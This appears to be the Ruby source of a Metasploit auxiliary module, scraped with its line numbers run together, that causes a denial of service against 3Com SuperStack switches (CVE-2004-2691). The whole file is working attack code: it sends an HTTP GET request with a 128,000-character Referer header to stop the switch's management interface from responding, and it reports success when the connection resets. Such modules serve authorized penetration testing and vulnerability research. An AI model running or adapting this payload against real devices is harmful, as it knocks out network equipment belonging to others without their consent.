Path: blob/master/modules/auxiliary/dos/http/3com_superstack_switch.rb
19500 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => '3Com SuperStack Switch Denial of Service',14'Description' => %q{15This module causes a temporary denial of service condition16against 3Com SuperStack switches. By sending excessive data17to the HTTP Management interface, the switch stops responding18temporarily. The device does not reset. Tested successfully19against a 3300SM firmware v2.66. Reported to affect versions20prior to v2.72.21},22'Author' => [ 'aushack' ],23'License' => MSF_LICENSE,24'References' => [25# aushack - I am not sure if these are correct, but the closest match!26[ 'OSVDB', '7246' ],27[ 'CVE', '2004-2691' ],28[ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ],29],30'DisclosureDate' => '2004-06-24',31'Notes' => {32'Stability' => [CRASH_SERVICE_DOWN],33'SideEffects' => [],34'Reliability' => []35}36)37)3839register_options([ Opt::RPORT(80) ])40end4142def run43connect44print_status("Sending DoS packet to #{rhost}:#{rport}")4546sploit = "GET / HTTP/1.0\r\n"47sploit << 'Referer: ' + Rex::Text.rand_text_alpha(1) * 1280004849sock.put(sploit + "\r\n\r\n")50disconnect51print_error('DoS packet unsuccessful')52rescue ::Rex::ConnectionRefused53print_error("Unable to connect to #{rhost}:#{rport}")54rescue ::Errno::ECONNRESET55print_good("DoS packet successful. #{rhost} not responding.")56end57end585960